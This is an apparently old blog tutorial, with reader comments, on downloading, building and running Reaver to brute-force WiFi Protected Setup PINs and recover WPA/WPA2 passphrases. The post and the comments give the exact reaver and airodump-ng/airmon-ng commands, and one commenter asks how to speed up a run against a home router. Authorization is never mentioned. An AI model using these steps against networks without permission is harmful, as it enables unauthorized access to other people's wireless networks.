Linux

Setting Up Reaver, the WiFi Protected Setup Attack Tool

Security Experts has discovered that WiFi Protected Setup (WPS) is vulnerable and not secured because if an attacker tries to bruteforce an Access Point(AP) using WPS Pin Attack within his range, the attacker may be able to recover the WPA/WPA2 passphrase in 4-10 hours but it also depends on the AP. They also found out that the attack may cause a denial of service attack to the router.

Just today, news have spread that the Tactical Network Solutions have released an Open Source tool that lets you perform an attack on a WPS AP. And so in this article we will try to setup the said tool which is name as Reaver which reminds me of a protoss mobile artillery unit in Starcraft (trolololol).

To download this tool just wget it from this link. (update new version is 1.3):

wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

Extract the gzip file:

tar zxvf reaver-1.3.tar.gz

Move to the directory for installation:

cd reaver-1.3/src

./configure

make

make install

To get the BSID of the AP, you can use airodump-ng wlan0 which is also used for packet capturing of raw 802.11 frames. In order to start the attack, set the BSID and make sure to enable monitor mode (reaver -i mon0 -b <bsid:here> ). For example:

reaver -i mon0 -b 78:44:76:0E:09:54

Brute force attack against Wifi Protected Setup

Well that should be it. The instructions can also be found in this directory and file : reaver-1.1/docs/README. If you want to read it you may launch gedit or you may cat it.

cat reaver-1.3/docs/README

or

gedit reaver-1.3/docs/README

Security Experts said that there is no patch for this vulnerability yet.

15 Comments

  1. Guys, im starting with Linux and computers as well, so I had problem even with this simple guide. Yes, you could say: F*** that BFU but you can also consider it as helping the next generation. Please.

    My problem is that i dunno how to move a file to cd / because I dont even know what is it. Could you give me a hint, please? Is it some folder or something like that?
    I would be really thankful – maybe a few years later I will be able to help you
    Thank you guys

    Reply
  2. Em, I use bt 5. Got the following error:
    # make install
    if [ ! -d /etc/reaver ]; then mkdir /etc/reaver; fi
    if [ -e reaver ]; then cp reaver /usr/local/bin/reaver; fi
    ln -s /usr/local/bin/reaver /usr/bin/reaver
    ln: creating symbolic link /usr/bin/reaver': File exists
    make: *** [install] Error 1

    /etc/reaver is there. I did copy reaver from the installation folder to /usr/local/bin/reaver
    However, when I do ln -s /usr/local/bin/reaver /usr/bin/reaver, it still complains: # ln -s /usr/local/bin/reaver /usr/bin/reaver
    ln: creating symbolic link
    /usr/bin/reaver’: File exists

    Reply
  3. Read the error message:
    ln: creating symbolic link `/usr/bin/reaver’: File exists

    So u have already install it, so remove the old link:

    “rm /usr/bin/reaver”

    and install again
    “make install”

    Reply
    1. BSSID – basic service set identifier. To simplify, its is the MAC address of the access point.

      Use airodump-ng as suggested: airodump-ng wlanx (use iwconfig to determine what wlan card to use, eg wlan1, wlan2, etc). You can also use airmon-ng start wlanx to put the card into monitor mode and then airodump mon0 to find the BSSID.

      Greg

      Reply
  4. managed to get it going and left it running over night. seems to be working as its upto 2% after 10hours! getting alot of timeouts and ‘last message not processed properly’ but the main thing is its running. is there anyway of speeding this up though? its a bthomehub im testing on. with ‘reaver -i mon0 -b 20:2b:c1:xx:xx:xx -c 6 -E -S -a -vv’ and have -34/38 PWR.

    Thanks

    Reply

Leave a Reply